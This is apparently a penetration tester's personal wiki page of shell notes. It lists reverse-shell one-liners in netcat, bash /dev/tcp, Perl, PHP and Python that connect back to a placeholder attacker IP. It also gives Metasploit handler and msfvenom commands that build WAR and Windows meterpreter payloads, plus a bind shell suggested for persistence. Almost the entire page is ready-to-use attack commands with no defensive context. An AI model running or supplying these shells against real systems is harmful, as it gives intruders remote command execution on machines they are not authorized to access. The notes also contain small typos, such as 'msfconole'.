Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.6
Creation-Date: 2020-12-19T21:27:19-05:00

====== 0x3C Networking and Shells ======
Created Saturday 19 December 2020

==== NETCAT ====
On attack box: //nc -lvp 4444//
THENNNNNNNNN

For Linux: //nc [Attack box IP] 4444 -e /bin/sh//
For Linux w/o netcat: //bash -i >& /dev/tcp/[Attack box IP]/[Port] 0>&1//
For Windows: //nc.exe [Attack box IP] 4444 -e cmd.exe//
Perl: //perl -e 'use Socket;$i="[Attack box//
//IP]";$p=[Port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p//
//,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'//
PHP: //php -r '$sock=fsockopen("[Attack box IP]",[Port]);exec("/bin/sh -i <&3 >&3 2>&3");' //
	#Drop the php -r and the single quotes if you're putting this in a php file.
Python: //python -c 'import//
//socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[Attack//
//box IP]",[Port]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);//
//os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'//

==== METERPRETER ====
On attack box: 
	//msfconole//
	//use exploit/multi/handler//
	//set payload windows/meterpreter/reverse_tcp//

WAR Reverse Shell:
	//msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Attack box IP] LPORT=4444 -f war >//
	///root/Desktop/shell.war//

Windows Binary:
	//msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=[IP attackbox]//
	//LPORT=4444 -f exe -o /tmp/exploit.exe//

==== BIND ====
To set up persistence for multiple users you can reverse the process
On target box: //nc -lvp 4444 -e /bin/sh//
On attack box: //nc [target ip] 4444// 
**UPGRADE TO A STABLE SHELL WITH: **//python -c 'import pty; pty.spawn("/bin/bash")'//


